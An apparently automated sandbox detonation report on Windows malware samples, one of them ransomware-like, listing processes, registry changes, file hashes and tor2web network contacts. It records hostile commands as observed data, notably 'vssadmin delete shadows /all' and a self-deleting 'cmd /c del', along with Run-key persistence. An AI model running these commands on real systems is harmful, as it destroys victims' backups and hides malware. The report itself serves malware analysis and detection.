"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
Network
Files
C:\Users\Admin\AppData\Roaming\hugufdp.exe
C:\Users\Admin\AppData\Roaming\log.html
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win10ltsc2021-20241023-en
Max time kernel
101s
Max time network
102s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 4928 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
"C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe"
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
Network
Files
memory/4928-0-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20241010-en
Max time kernel
79s
Max time network
80s
Command Line
Signatures
Deletes shadow copies
Renames multiple (735) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\kifyvva.exe" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Reserved_Words.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Break.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Parsing.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_environment_variables.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_While.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\prnhp004.inf_amd64_neutral_53f688945cfc24cc\Amd64\hpzpaw72.vdf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_CommonParameters.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\StarterE\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ja-JP\Licenses\eval\EnterpriseN\license.rtf | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_regular_expressions.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_try_catch_finally.help.txt | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
Drops file in Windows directory
| Description | Indicator | Process | Target |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\kifyvva.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90b9be135836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4C827E11-A24B-11EF-9D46-D6B302822781} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b13190000000002000000000010660000000100002000000046928c5b24df8e6df6a8646658311650827767bb200db8b554229dbb52be1284000000000e8000000002000020000000dcf841d3d9192f9793d48e0eeff60d48df6786477dd03cbb8ddf49b5752893d920000000d80aabd13c79f87ac8e6c5201449032373f58e53ca4dc5cd00646e87474f5236400000000bb292eee62d830a114105a654ee28cf38e573428e4a94be2125b00814ebbb369f907a935ada022ded8903605e2e42073f7ae7668ea96199f41634bead67bd36 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437724845" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\kifyvva.exe
C:\Users\Admin\AppData\Roaming\kifyvva.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275463 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275472 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:472075 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3552279 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3159056 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3159076 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:996382 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:2831395 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.org | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.blutmagie.de | udp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.fi | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
\Users\Admin\AppData\Roaming\kifyvva.exe
| MD5 | 209a288c68207d57e0ce6e60ebf60729 |
| SHA1 | e654d39cd13414b5151e8cf0d8f5b166dddd45cb |
| SHA256 | 3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370 |
| SHA512 | ce4a7e42738154183fc53702f0841dfd4ad1eb0567b13cc1ff0909f1d330e9cd2fb994375efc6f02e7eddaaae1f465ff93458412143266afdaff1c6bf6477fc3 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | c5dec7cba3faf35f20af2330cc7363ef |
| SHA1 | d8dc879ece2815b7fc88b50ee985c557f232ef6f |
| SHA256 | 21c06ccbfc7c9384adb210c41ad198873551e2579280272bdacf7ccdf29d3371 |
| SHA512 | 507abd729fe93baefa85753ae817eaabe6178e6c032a3b4650ecc9963fe0856ce0013aecf685735bff93ad964df54de5da03782fdbdb5f7837c7c04da9ecfb23 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | 415d5e8d2195ac80b8717205ba32f687 |
| SHA1 | 2981fd9e353b1ca5adbf3b30c596e06682b728eb |
| SHA256 | d828551b3944600d9f79b98f870313bdd8cf74fbbf390d9b3ddc35cb4181eca7 |
| SHA512 | ceaf9ae082b0cb83c59374b8f5ca5d6f30e3e4fdbb14fe70e10528b8e613ac010ec4fe9fde165b68dd61e5f568e260f1b08c11b23f46919fdd5c63862351b4bb |
C:\Users\Admin\AppData\Local\Temp\CabCBD9.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCD15.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
